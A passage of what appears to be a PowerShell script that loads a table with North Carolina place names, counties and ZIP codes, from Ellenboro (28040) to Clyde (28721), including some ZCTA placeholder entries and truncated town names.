$Cities.Rows.Add("Ellenboro","Rutherford","North carolina","NC","37","28040") + $null = $Cities.Rows.Add("Alexander mills","Rutherford","North carolina","NC","37","28043") + $null = $Cities.Rows.Add("Gastonia","Gaston","North carolina","NC","37","28052") + $null = $Cities.Rows.Add("Gastonia","Gaston","North carolina","NC","37","28054") + $null = $Cities.Rows.Add("Gastonia","Gaston","North carolina","NC","37","28056") + $null = $Cities.Rows.Add("Gold hill","Rowan","North carolina","NC","37","28071") + $null = $Cities.Rows.Add("Granite quarry","Rowan","North carolina","NC","37","28072") + $null = $Cities.Rows.Add("Grover","Cleveland","North carolina","NC","37","28073") + $null = $Cities.Rows.Add("Harrisburg","Cabarrus","North carolina","NC","37","28075") + $null = $Cities.Rows.Add("Henrietta","Rutherford","North carolina","NC","37","28076") + $null = $Cities.Rows.Add("High shoals","Gaston","North carolina","NC","37","28077") + $null = $Cities.Rows.Add("Cornelius","Mecklenburg","North carolina","NC","37","28078") + $null = $Cities.Rows.Add("Indian trail","Union","North carolina","NC","37","28079") + $null = $Cities.Rows.Add("Iron station","Lincoln","North carolina","NC","37","28080") + $null = $Cities.Rows.Add("Kannapolis","Cabarrus","North carolina","NC","37","28081") + $null = $Cities.Rows.Add("Kannapolis","Cabarrus","North carolina","NC","37","28083") + $null = $Cities.Rows.Add("Kings mountain","Cleveland","North carolina","NC","37","28086") + $null = $Cities.Rows.Add("Landis","Rowan","North carolina","NC","37","28088") + $null = $Cities.Rows.Add("Lattimore","Cleveland","North carolina","NC","37","28089") + $null = $Cities.Rows.Add("Lawndale","Cleveland","North carolina","NC","37","28090") + $null = $Cities.Rows.Add("Lilesville","Anson","North carolina","NC","37","28091") + $null = $Cities.Rows.Add("Boger city","Lincoln","North carolina","NC","37","28092") + $null = $Cities.Rows.Add("Locust","Stanly","North carolina","NC","37","28097") + $null = $Cities.Rows.Add("Lowell","Gaston","North carolina","NC","37","28098") + $null = $Cities.Rows.Add("Zcta 280hh","Anson","North carolina","NC","37","280HH") + $null = $Cities.Rows.Add("Mc adenville","Gaston","North carolina","NC","37","28101") + $null = $Cities.Rows.Add("Mc farlan","Anson","North carolina","NC","37","28102") + $null = $Cities.Rows.Add("Marshville","Union","North carolina","NC","37","28103") + $null = $Cities.Rows.Add("Zcta 28104","Union","North carolina","NC","37","28104") + $null = $Cities.Rows.Add("Stallings","Mecklenburg","North carolina","NC","37","28105") + $null = $Cities.Rows.Add("Midland","Cabarrus","North carolina","NC","37","28107") + $null = $Cities.Rows.Add("Misenheimer","Stanly","North carolina","NC","37","28109") + $null = $Cities.Rows.Add("Monroe","Union","North carolina","NC","37","28110") + $null = $Cities.Rows.Add("Monroe","Union","North carolina","NC","37","28112") + $null = $Cities.Rows.Add("Mooresboro","Rutherford","North carolina","NC","37","28114") + $null = $Cities.Rows.Add("Mooresville","Iredell","North carolina","NC","37","28115") + $null = $Cities.Rows.Add("Zcta 28117","Iredell","North carolina","NC","37","28117") + $null = $Cities.Rows.Add("Morven","Anson","North carolina","NC","37","28119") + $null = $Cities.Rows.Add("Mount holly","Gaston","North carolina","NC","37","28120") + $null = $Cities.Rows.Add("Mount pleasant","Cabarrus","North carolina","NC","37","28124") + $null = $Cities.Rows.Add("Mount ulla","Rowan","North carolina","NC","37","28125") + $null = $Cities.Rows.Add("New london","Stanly","North carolina","NC","37","28127") + $null = $Cities.Rows.Add("Norwood","Stanly","North carolina","NC","37","28128") + $null = $Cities.Rows.Add("Oakboro","Stanly","North carolina","NC","37","28129") + $null = $Cities.Rows.Add("Peachland","Anson","North carolina","NC","37","28133") + $null = $Cities.Rows.Add("Pineville","Mecklenburg","North carolina","NC","37","28134") + $null = $Cities.Rows.Add("Polkton","Anson","North carolina","NC","37","28135") + $null = $Cities.Rows.Add("Richfield","Stanly","North carolina","NC","37","28137") + $null = $Cities.Rows.Add("Rockwell","Rowan","North carolina","NC","37","28138") + $null = $Cities.Rows.Add("Rutherfordton","Rutherford","North carolina","NC","37","28139") + $null = $Cities.Rows.Add("Salisbury","Rowan","North carolina","NC","37","28144") + $null = $Cities.Rows.Add("Salisbury","Rowan","North carolina","NC","37","28146") + $null = $Cities.Rows.Add("Salisbury","Rowan","North carolina","NC","37","28147") + $null = $Cities.Rows.Add("Kingstown","Cleveland","North carolina","NC","37","28150") + $null = $Cities.Rows.Add("Shelby","Cleveland","North carolina","NC","37","28152") + $null = $Cities.Rows.Add("Spencer","Rowan","North carolina","NC","37","28159") + $null = $Cities.Rows.Add("Spindale","Rutherford","North carolina","NC","37","28160") + $null = $Cities.Rows.Add("Stanfield","Stanly","North carolina","NC","37","28163") + $null = $Cities.Rows.Add("Stanley","Gaston","North carolina","NC","37","28164") + $null = $Cities.Rows.Add("Troutman","Iredell","North carolina","NC","37","28166") + $null = $Cities.Rows.Add("Union mills","Rutherford","North carolina","NC","37","28167") + $null = $Cities.Rows.Add("Vale","Lincoln","North carolina","NC","37","28168") + $null = $Cities.Rows.Add("Waco","Cleveland","North carolina","NC","37","28169") + $null = $Cities.Rows.Add("Wadesboro","Anson","North carolina","NC","37","28170") + $null = $Cities.Rows.Add("Weddington","Union","North carolina","NC","37","28173") + $null = $Cities.Rows.Add("Wingate","Union","North carolina","NC","37","28174") + $null = $Cities.Rows.Add("Zcta 281hh","Anson","North carolina","NC","37","281HH") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28202") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28203") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28204") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28205") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28206") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28207") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28208") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28209") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28210") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28211") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28212") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28213") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28214") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28215") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28216") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28217") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28223") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28226") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28227") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28262") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28269") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28270") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28273") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28277") + $null = $Cities.Rows.Add("Charlotte","Mecklenburg","North carolina","NC","37","28278") + $null = $Cities.Rows.Add("Zcta 282hh","Mecklenburg","North carolina","NC","37","282HH") + $null = $Cities.Rows.Add("East fayettevill","Cumberland","North carolina","NC","37","28301") + $null = $Cities.Rows.Add("Bonnie doone","Cumberland","North carolina","NC","37","28303") + $null = $Cities.Rows.Add("Fayetteville","Cumberland","North carolina","NC","37","28304") + $null = $Cities.Rows.Add("Fayetteville","Cumberland","North carolina","NC","37","28305") + $null = $Cities.Rows.Add("Fayetteville","Cumberland","North carolina","NC","37","28306") + $null = $Cities.Rows.Add("Fort bragg","Cumberland","North carolina","NC","37","28307") + $null = $Cities.Rows.Add("Fayetteville","Cumberland","North carolina","NC","37","28311") + $null = $Cities.Rows.Add("Fayetteville","Cumberland","North carolina","NC","37","28314") + $null = $Cities.Rows.Add("Aberdeen","Moore","North carolina","NC","37","28315") + $null = $Cities.Rows.Add("Autryville","Sampson","North carolina","NC","37","28318") + $null = $Cities.Rows.Add("Bladenboro","Bladen","North carolina","NC","37","28320") + $null = $Cities.Rows.Add("Bunnlevel","Harnett","North carolina","NC","37","28323") + $null = $Cities.Rows.Add("Calypso","Duplin","North carolina","NC","37","28325") + $null = $Cities.Rows.Add("Johnsonville","Harnett","North carolina","NC","37","28326") + $null = $Cities.Rows.Add("Carthage","Moore","North carolina","NC","37","28327") + $null = $Cities.Rows.Add("Clinton","Sampson","North carolina","NC","37","28328") + $null = $Cities.Rows.Add("Cordova","Richmond","North carolina","NC","37","28330") + $null = $Cities.Rows.Add("Dublin","Bladen","North carolina","NC","37","28332") + $null = $Cities.Rows.Add("Dudley","Wayne","North carolina","NC","37","28333") + $null = $Cities.Rows.Add("Dunn","Harnett","North carolina","NC","37","28334") + $null = $Cities.Rows.Add("Elizabethtown","Bladen","North carolina","NC","37","28337") + $null = $Cities.Rows.Add("Ellerbe","Richmond","North carolina","NC","37","28338") + $null = $Cities.Rows.Add("Erwin","Harnett","North carolina","NC","37","28339") + $null = $Cities.Rows.Add("Mcdonald","Robeson","North carolina","NC","37","28340") + $null = $Cities.Rows.Add("Faison","Sampson","North carolina","NC","37","28341") + $null = $Cities.Rows.Add("Falcon","Cumberland","North carolina","NC","37","28342") + $null = $Cities.Rows.Add("Gibson","Scotland","North carolina","NC","37","28343") + $null = $Cities.Rows.Add("Godwin","Sampson","North carolina","NC","37","28344") + $null = $Cities.Rows.Add("Hamlet","Richmond","North carolina","NC","37","28345") + $null = $Cities.Rows.Add("Hoffman","Richmond","North carolina","NC","37","28347") + $null = $Cities.Rows.Add("Hope mills","Cumberland","North carolina","NC","37","28348") + $null = $Cities.Rows.Add("Kenansville","Duplin","North carolina","NC","37","28349") + $null = $Cities.Rows.Add("Lakeview","Moore","North carolina","NC","37","28350") + $null = $Cities.Rows.Add("Laurel hill","Scotland","North carolina","NC","37","28351") + $null = $Cities.Rows.Add("Laurinburg","Scotland","North carolina","NC","37","28352") + $null = $Cities.Rows.Add("Linden","Cumberland","North carolina","NC","37","28356") + $null = $Cities.Rows.Add("Lumber bridge","Robeson","North carolina","NC","37","28357") + $null = $Cities.Rows.Add("Lumberton","Robeson","North carolina","NC","37","28358") + $null = $Cities.Rows.Add("Zcta 28360","Robeson","North carolina","NC","37","28360") + $null = $Cities.Rows.Add("Marietta","Robeson","North carolina","NC","37","28362") + $null = $Cities.Rows.Add("Marston","Scotland","North carolina","NC","37","28363") + $null = $Cities.Rows.Add("Maxton","Robeson","North carolina","NC","37","28364") + $null = $Cities.Rows.Add("Mount olive","Wayne","North carolina","NC","37","28365") + $null = $Cities.Rows.Add("Newton grove","Sampson","North carolina","NC","37","28366") + $null = $Cities.Rows.Add("Norman","Richmond","North carolina","NC","37","28367") + $null = $Cities.Rows.Add("Olivia","Harnett","North carolina","NC","37","28368") + $null = $Cities.Rows.Add("Orrum","Robeson","North carolina","NC","37","28369") + $null = $Cities.Rows.Add("Parkton","Robeson","North carolina","NC","37","28371") + $null = $Cities.Rows.Add("Pembroke","Robeson","North carolina","NC","37","28372") + $null = $Cities.Rows.Add("Pinebluff","Moore","North carolina","NC","37","28373") + $null = $Cities.Rows.Add("Pinehurst","Moore","North carolina","NC","37","28374") + $null = $Cities.Rows.Add("Raeford","Hoke","North carolina","NC","37","28376") + $null = $Cities.Rows.Add("Red springs","Robeson","North carolina","NC","37","28377") + $null = $Cities.Rows.Add("Rex","Robeson","North carolina","NC","37","28378") + $null = $Cities.Rows.Add("Rockingham","Richmond","North carolina","NC","37","28379") + $null = $Cities.Rows.Add("Roseboro","Sampson","North carolina","NC","37","28382") + $null = $Cities.Rows.Add("Rowland","Robeson","North carolina","NC","37","28383") + $null = $Cities.Rows.Add("Saint pauls","Robeson","North carolina","NC","37","28384") + $null = $Cities.Rows.Add("Salemburg","Sampson","North carolina","NC","37","28385") + $null = $Cities.Rows.Add("Shannon","Robeson","North carolina","NC","37","28386") + $null = $Cities.Rows.Add("Southern pines","Moore","North carolina","NC","37","28387") + $null = $Cities.Rows.Add("Spring lake","Cumberland","North carolina","NC","37","28390") + $null = $Cities.Rows.Add("Stedman","Cumberland","North carolina","NC","37","28391") + $null = $Cities.Rows.Add("Tar heel","Bladen","North carolina","NC","37","28392") + $null = $Cities.Rows.Add("Turkey","Sampson","North carolina","NC","37","28393") + $null = $Cities.Rows.Add("Vass","Moore","North carolina","NC","37","28394") + $null = $Cities.Rows.Add("Wade","Cumberland","North carolina","NC","37","28395") + $null = $Cities.Rows.Add("Wagram","Scotland","North carolina","NC","37","28396") + $null = $Cities.Rows.Add("Bowdens","Duplin","North carolina","NC","37","28398") + $null = $Cities.Rows.Add("White oak","Bladen","North carolina","NC","37","28399") + $null = $Cities.Rows.Add("Zcta 283hh","Bladen","North carolina","NC","37","283HH") + $null = $Cities.Rows.Add("Zcta 283xx","Scotland","North carolina","NC","37","283XX") + $null = $Cities.Rows.Add("Cape fear","New Hanover","North carolina","NC","37","28401") + $null = $Cities.Rows.Add("Wilmington","New Hanover","North carolina","NC","37","28403") + $null = $Cities.Rows.Add("Ogden","New Hanover","North carolina","NC","37","28405") + $null = $Cities.Rows.Add("Wilmington","New Hanover","North carolina","NC","37","28409") + $null = $Cities.Rows.Add("Zcta 28411","New Hanover","North carolina","NC","37","28411") + $null = $Cities.Rows.Add("Wilmington","New Hanover","North carolina","NC","37","28412") + $null = $Cities.Rows.Add("Ash","Brunswick","North carolina","NC","37","28420") + $null = $Cities.Rows.Add("Atkinson","Pender","North carolina","NC","37","28421") + $null = $Cities.Rows.Add("Bolivia","Brunswick","North carolina","NC","37","28422") + $null = $Cities.Rows.Add("Bolton","Columbus","North carolina","NC","37","28423") + $null = $Cities.Rows.Add("Burgaw","Pender","North carolina","NC","37","28425") + $null = $Cities.Rows.Add("Carolina beach","New Hanover","North carolina","NC","37","28428") + $null = $Cities.Rows.Add("Castle hayne","New Hanover","North carolina","NC","37","28429") + $null = $Cities.Rows.Add("Cerro gordo","Columbus","North carolina","NC","37","28430") + $null = $Cities.Rows.Add("Chadbourn","Columbus","North carolina","NC","37","28431") + $null = $Cities.Rows.Add("Clarendon","Columbus","North carolina","NC","37","28432") + $null = $Cities.Rows.Add("Clarkton","Bladen","North carolina","NC","37","28433") + $null = $Cities.Rows.Add("Council","Bladen","North carolina","NC","37","28434") + $null = $Cities.Rows.Add("Currie","Pender","North carolina","NC","37","28435") + $null = $Cities.Rows.Add("Delco","Columbus","North carolina","NC","37","28436") + $null = $Cities.Rows.Add("Evergreen","Columbus","North carolina","NC","37","28438") + $null = $Cities.Rows.Add("Fair bluff","Columbus","North carolina","NC","37","28439") + $null = $Cities.Rows.Add("Garland","Sampson","North carolina","NC","37","28441") + $null = $Cities.Rows.Add("Hallsboro","Columbus","North carolina","NC","37","28442") + $null = $Cities.Rows.Add("Hampstead","Pender","North carolina","NC","37","28443") + $null = $Cities.Rows.Add("Harrells","Sampson","North carolina","NC","37","28444") + $null = $Cities.Rows.Add("Surf city","Onslow","North carolina","NC","37","28445") + $null = $Cities.Rows.Add("Ivanhoe","Sampson","North carolina","NC","37","28447") + $null = $Cities.Rows.Add("Kelly","Bladen","North carolina","NC","37","28448") + $null = $Cities.Rows.Add("Kure beach","New Hanover","North carolina","NC","37","28449") + $null = $Cities.Rows.Add("Lake waccamaw","Columbus","North carolina","NC","37","28450") + $null = $Cities.Rows.Add("Leland","Brunswick","North carolina","NC","37","28451") + $null = $Cities.Rows.Add("Longwood","Brunswick","North carolina","NC","37","28452") + $null = $Cities.Rows.Add("Magnolia","Duplin","North carolina","NC","37","28453") + $null = $Cities.Rows.Add("Maple hill","Onslow","North carolina","NC","37","28454") + $null = $Cities.Rows.Add("Nakina","Columbus","North carolina","NC","37","28455") + $null = $Cities.Rows.Add("Riegelwood","Columbus","North carolina","NC","37","28456") + $null = $Cities.Rows.Add("Rocky point","Pender","North carolina","NC","37","28457") + $null = $Cities.Rows.Add("Rose hill","Duplin","North carolina","NC","37","28458") + $null = $Cities.Rows.Add("Sneads ferry","Onslow","North carolina","NC","37","28460") + $null = $Cities.Rows.Add("Boiling spring l","Brunswick","North carolina","NC","37","28461") + $null = $Cities.Rows.Add("Holden beach","Brunswick","North carolina","NC","37","28462") + $null = $Cities.Rows.Add("Tabor city","Columbus","North carolina","NC","37","28463") + $null = $Cities.Rows.Add("Teachey","Duplin","North carolina","NC","37","28464") + $null = $Cities.Rows.Add("Oak island","Brunswick","North carolina","NC","37","28465") + $null = $Cities.Rows.Add("Wallace","Duplin","North carolina","NC","37","28466") + $null = $Cities.Rows.Add("Calabash","Brunswick","North carolina","NC","37","28467") + $null = $Cities.Rows.Add("Sunset beach","Brunswick","North carolina","NC","37","28468") + $null = $Cities.Rows.Add("Ocean isle beach","Brunswick","North carolina","NC","37","28469") + $null = $Cities.Rows.Add("South brunswick","Brunswick","North carolina","NC","37","28470") + $null = $Cities.Rows.Add("Watha","Pender","North carolina","NC","37","28471") + $null = $Cities.Rows.Add("Whiteville","Columbus","North carolina","NC","37","28472") + $null = $Cities.Rows.Add("Willard","Pender","North carolina","NC","37","28478") + $null = $Cities.Rows.Add("Winnabow","Brunswick","North carolina","NC","37","28479") + $null = $Cities.Rows.Add("Wrightsville bea","New Hanover","North carolina","NC","37","28480") + $null = $Cities.Rows.Add("Zcta 284hh","Bladen","North carolina","NC","37","284HH") + $null = $Cities.Rows.Add("Zcta 284xx","Columbus","North carolina","NC","37","284XX") + $null = $Cities.Rows.Add("Kinston","Lenoir","North carolina","NC","37","28501") + $null = $Cities.Rows.Add("Zcta 28504","Lenoir","North carolina","NC","37","28504") + $null = $Cities.Rows.Add("Albertson","Duplin","North carolina","NC","37","28508") + $null = $Cities.Rows.Add("Arapahoe","Pamlico","North carolina","NC","37","28510") + $null = $Cities.Rows.Add("Atlantic","Carteret","North carolina","NC","37","28511") + $null = $Cities.Rows.Add("Pine knoll shore","Carteret","North carolina","NC","37","28512") + $null = $Cities.Rows.Add("Ayden","Pitt","North carolina","NC","37","28513") + $null = $Cities.Rows.Add("Bayboro","Pamlico","North carolina","NC","37","28515") + $null = $Cities.Rows.Add("Beaufort","Carteret","North carolina","NC","37","28516") + $null = $Cities.Rows.Add("Beulaville","Duplin","North carolina","NC","37","28518") + $null = $Cities.Rows.Add("Bridgeton","Craven","North carolina","NC","37","28519") + $null = $Cities.Rows.Add("Cedar island","Carteret","North carolina","NC","37","28520") + $null = $Cities.Rows.Add("Chinquapin","Duplin","North carolina","NC","37","28521") + $null = $Cities.Rows.Add("Cove city","Craven","North carolina","NC","37","28523") + $null = $Cities.Rows.Add("Davis","Carteret","North carolina","NC","37","28524") + $null = $Cities.Rows.Add("Deep run","Lenoir","North carolina","NC","37","28525") + $null = $Cities.Rows.Add("Dover","Craven","North carolina","NC","37","28526") + $null = $Cities.Rows.Add("Ernul","Craven","North carolina","NC","37","28527") + $null = $Cities.Rows.Add("Gloucester","Carteret","North carolina","NC","37","28528") + $null = $Cities.Rows.Add("Grantsboro","Pamlico","North carolina","NC","37","28529") + $null = $Cities.Rows.Add("Grifton","Pitt","North carolina","NC","37","28530") + $null = $Cities.Rows.Add("Harkers island","Carteret","North carolina","NC","37","28531") + $null = $Cities.Rows.Add("Havelock","Craven","North carolina","NC","37","28532") + $null = $Cities.Rows.Add("Hobucken","Pamlico","North carolina","NC","37","28537") + $null = $Cities.Rows.Add("Hookerton","Greene","North carolina","NC","37","28538") + $null = $Cities.Rows.Add("Hubert","Onslow","North carolina","NC","37","28539") + $null = $Cities.Rows.Add("Jacksonville","Onslow","North carolina","NC","37","28540") + $null = $Cities.Rows.Add("Tarawa terrace","Onslow","North carolina","NC","37","28543") + $null = $Cities.Rows.Add("Midway park","Onslow","North carolina","NC","37","28544") + $null = $Cities.Rows.Add("Jacksonville","Onslow","North carolina","NC","37","28546") + $null = $Cities.Rows.Add("Camp lejeune","Onslow","North carolina","NC","37","28547") + $null = $Cities.Rows.Add("La grange","Lenoir","North carolina","NC","37","28551") + $null = $Cities.Rows.Add("Lowland","Pamlico","North carolina","NC","37","28552") + $null = $Cities.Rows.Add("Marshallberg","Carteret","North carolina","NC","37","28553") + $null = $Cities.Rows.Add("Maury","Greene","North carolina","NC","37","28554") + $null = $Cities.Rows.Add("Maysville","Onslow","North carolina","NC","37","28555") + $null = $Cities.Rows.Add("Merritt","Pamlico","North carolina","NC","37","28556") + $null = $Cities.Rows.Add("Morehead city","Carteret","North carolina","NC","37","28557") + $null = $Cities.Rows.Add("New bern","Craven","North carolina","NC","37","28560") + $null = $Cities.Rows.Add("New bern","Craven","North carolina","NC","37","28562") + $null = $Cities.Rows.Add("Newport","Carteret","North carolina","NC","37","28570") + $null = $Cities.Rows.Add("Oriental","Pamlico","North carolina","NC","37","28571") + $null = $Cities.Rows.Add("Pink hill","Duplin","North carolina","NC","37","28572") + $null = $Cities.Rows.Add("Pollocksville","Jones","North carolina","NC","37","28573") + $null = $Cities.Rows.Add("Richlands","Onslow","North carolina","NC","37","28574") + $null = $Cities.Rows.Add("Salter path","Carteret","North carolina","NC","37","28575") + $null = $Cities.Rows.Add("Sealevel","Carteret","North carolina","NC","37","28577") + $null = $Cities.Rows.Add("Seven springs","Wayne","North carolina","NC","37","28578") + $null = $Cities.Rows.Add("Smyrna","Carteret","North carolina","NC","37","28579") + $null = $Cities.Rows.Add("Snow hill","Greene","North carolina","NC","37","28580") + $null = $Cities.Rows.Add("Stacy","Carteret","North carolina","NC","37","28581") + $null = $Cities.Rows.Add("Stella","Onslow","North carolina","NC","37","28582") + $null = $Cities.Rows.Add("Swansboro","Carteret","North carolina","NC","37","28584") + $null = $Cities.Rows.Add("Trenton","Jones","North carolina","NC","37","28585") + $null = $Cities.Rows.Add("Vanceboro","Craven","North carolina","NC","37","28586") + $null = $Cities.Rows.Add("Williston","Carteret","North carolina","NC","37","28589") + $null = $Cities.Rows.Add("Winterville","Pitt","North carolina","NC","37","28590") + $null = $Cities.Rows.Add("Emerald isle","Carteret","North carolina","NC","37","28594") + $null = $Cities.Rows.Add("Zcta 285hh","Carteret","North carolina","NC","37","285HH") + $null = $Cities.Rows.Add("Zcta 285xx","Carteret","North carolina","NC","37","285XX") + $null = $Cities.Rows.Add("Hickory","Catawba","North carolina","NC","37","28601") + $null = $Cities.Rows.Add("Hickory","Catawba","North carolina","NC","37","28602") + $null = $Cities.Rows.Add("Banner elk","Avery","North carolina","NC","37","28604") + $null = $Cities.Rows.Add("Blowing rock","Watauga","North carolina","NC","37","28605") + $null = $Cities.Rows.Add("Boomer","Wilkes","North carolina","NC","37","28606") + $null = $Cities.Rows.Add("Boone","Watauga","North carolina","NC","37","28607") + $null = $Cities.Rows.Add("Catawba","Catawba","North carolina","NC","37","28609") + $null = $Cities.Rows.Add("Claremont","Catawba","North carolina","NC","37","28610") + $null = $Cities.Rows.Add("Collettsville","Caldwell","North carolina","NC","37","28611") + $null = $Cities.Rows.Add("Connellys spring","Burke","North carolina","NC","37","28612") + $null = $Cities.Rows.Add("Conover","Catawba","North carolina","NC","37","28613") + $null = $Cities.Rows.Add("Creston","Ashe","North carolina","NC","37","28615") + $null = $Cities.Rows.Add("Crossnore","Avery","North carolina","NC","37","28616") + $null = $Cities.Rows.Add("Crumpler","Ashe","North carolina","NC","37","28617") + $null = $Cities.Rows.Add("Deep gap","Watauga","North carolina","NC","37","28618") + $null = $Cities.Rows.Add("Drexel","Burke","North carolina","NC","37","28619") + $null = $Cities.Rows.Add("Elkin","Surry","North carolina","NC","37","28621") + $null = $Cities.Rows.Add("Elk park","Avery","North carolina","NC","37","28622") + $null = $Cities.Rows.Add("Ennice","Alleghany","North carolina","NC","37","28623") + $null = $Cities.Rows.Add("Ferguson","Wilkes","North carolina","NC","37","28624") + $null = $Cities.Rows.Add("Zcta 28625","Iredell","North carolina","NC","37","28625") + $null = $Cities.Rows.Add("Fleetwood","Ashe","North carolina","NC","37","28626") + $null = $Cities.Rows.Add("Glade valley","Alleghany","North carolina","NC","37","28627") + $null = $Cities.Rows.Add("Glendale springs","Ashe","North carolina","NC","37","28629") + $null = $Cities.Rows.Add("Granite falls","Caldwell","North carolina","NC","37","28630") + $null = $Cities.Rows.Add("Grassy creek","Ashe","North carolina","NC","37","28631") + $null = $Cities.Rows.Add("Harmony","Iredell","North carolina","NC","37","28634") + $null = $Cities.Rows.Add("Hays","Wilkes","North carolina","NC","37","28635") + $null = $Cities.Rows.Add("Hiddenite","Alexander","North carolina","NC","37","28636") + $null = $Cities.Rows.Add("Hildebran","Burke","North carolina","NC","37","28637") + $null = $Cities.Rows.Add("Hudson","Caldwell","North carolina","NC","37","28638") + $null = $Cities.Rows.Add("Jefferson","Ashe","North carolina","NC","37","28640") + $null = $Cities.Rows.Add("Jonesville","Yadkin","North carolina","NC","37","28642") + $null = $Cities.Rows.Add("Lansing","Ashe","North carolina","NC","37","28643") + $null = $Cities.Rows.Add("Laurel springs","Alleghany","North carolina","NC","37","28644") + $null = $Cities.Rows.Add("Lenoir","Caldwell","North carolina","NC","37","28645") + $null = $Cities.Rows.Add("Linville","Avery","North carolina","NC","37","28646") + $null = $Cities.Rows.Add("Mc grady","Wilkes","North carolina","NC","37","28649") + $null = $Cities.Rows.Add("Maiden","Catawba","North carolina","NC","37","28650") + $null = $Cities.Rows.Add("Millers creek","Wilkes","North carolina","NC","37","28651") + $null = $Cities.Rows.Add("Moravian falls","Wilkes","North carolina","NC","37","28654") + $null = $Cities.Rows.Add("Morganton","Burke","North carolina","NC","37","28655") + $null = $Cities.Rows.Add("Frank","Avery","North carolina","NC","37","28657") + $null = $Cities.Rows.Add("Newton","Catawba","North carolina","NC","37","28658") + $null = $Cities.Rows.Add("North wilkesboro","Wilkes","North carolina","NC","37","28659") + $null = $Cities.Rows.Add("Olin","Iredell","North carolina","NC","37","28660") + $null = $Cities.Rows.Add("Pineola","Avery","North carolina","NC","37","28662") + $null = $Cities.Rows.Add("Piney creek","Alleghany","North carolina","NC","37","28663") + $null = $Cities.Rows.Add("Purlear","Wilkes","North carolina","NC","37","28665") + $null = $Cities.Rows.Add("Icard","Burke","North carolina","NC","37","28666") + $null = $Cities.Rows.Add("Roaring gap","Alleghany","North carolina","NC","37","28668") + $null = $Cities.Rows.Add("Roaring river","Wilkes","North carolina","NC","37","28669") + $null = $Cities.Rows.Add("Ronda","Wilkes","North carolina","NC","37","28670") + $null = $Cities.Rows.Add("Rutherford colle","Burke","North carolina","NC","37","28671") + $null = $Cities.Rows.Add("Sherrills ford","Catawba","North carolina","NC","37","28673") + $null = $Cities.Rows.Add("Sparta","Alleghany","North carolina","NC","37","28675") + $null = $Cities.Rows.Add("State road","Surry","North carolina","NC","37","28676") + $null = $Cities.Rows.Add("Statesville","Iredell","North carolina","NC","37","28677") + $null = $Cities.Rows.Add("Stony point","Alexander","North carolina","NC","37","28678") + $null = $Cities.Rows.Add("Sugar grove","Watauga","North carolina","NC","37","28679") + $null = $Cities.Rows.Add("Taylorsville","Alexander","North carolina","NC","37","28681") + $null = $Cities.Rows.Add("Terrell","Catawba","North carolina","NC","37","28682") + $null = $Cities.Rows.Add("Thurmond","Surry","North carolina","NC","37","28683") + $null = $Cities.Rows.Add("Todd","Ashe","North carolina","NC","37","28684") + $null = $Cities.Rows.Add("Traphill","Wilkes","North carolina","NC","37","28685") + $null = $Cities.Rows.Add("Union grove","Iredell","North carolina","NC","37","28689") + $null = $Cities.Rows.Add("Valdese","Burke","North carolina","NC","37","28690") + $null = $Cities.Rows.Add("Vilas","Watauga","North carolina","NC","37","28692") + $null = $Cities.Rows.Add("Warrensville","Ashe","North carolina","NC","37","28693") + $null = $Cities.Rows.Add("West jefferson","Ashe","North carolina","NC","37","28694") + $null = $Cities.Rows.Add("Wilkesboro","Wilkes","North carolina","NC","37","28697") + $null = $Cities.Rows.Add("Zionville","Watauga","North carolina","NC","37","28698") + $null = $Cities.Rows.Add("Zcta 286hh","Alexander","North carolina","NC","37","286HH") + $null = $Cities.Rows.Add("Alexander","Buncombe","North carolina","NC","37","28701") + $null = $Cities.Rows.Add("Almond","Swain","North carolina","NC","37","28702") + $null = $Cities.Rows.Add("Arden","Buncombe","North carolina","NC","37","28704") + $null = $Cities.Rows.Add("Bakersville","Mitchell","North carolina","NC","37","28705") + $null = $Cities.Rows.Add("Balsam","Jackson","North carolina","NC","37","28707") + $null = $Cities.Rows.Add("Balsam grove","Transylvania","North carolina","NC","37","28708") + $null = $Cities.Rows.Add("Barnardsville","Buncombe","North carolina","NC","37","28709") + $null = $Cities.Rows.Add("Bat cave","Henderson","North carolina","NC","37","28710") + $null = $Cities.Rows.Add("Black mountain s","Buncombe","North carolina","NC","37","28711") + $null = $Cities.Rows.Add("Brevard","Transylvania","North carolina","NC","37","28712") + $null = $Cities.Rows.Add("Bryson city","Swain","North carolina","NC","37","28713") + $null = $Cities.Rows.Add("Burnsville","Yancey","North carolina","NC","37","28714") + $null = $Cities.Rows.Add("Candler","Buncombe","North carolina","NC","37","28715") + $null = $Cities.Rows.Add("Canton","Haywood","North carolina","NC","37","28716") + $null = $Cities.Rows.Add("Cashiers","Jackson","North carolina","NC","37","28717") + $null = $Cities.Rows.Add("Cedar mountain","Transylvania","North carolina","NC","37","28718") + $null = $Cities.Rows.Add("Cherokee","Swain","North carolina","NC","37","28719") + $null = $Cities.Rows.Add("Clyde","Haywood","North carolina","NC","37","28721") + 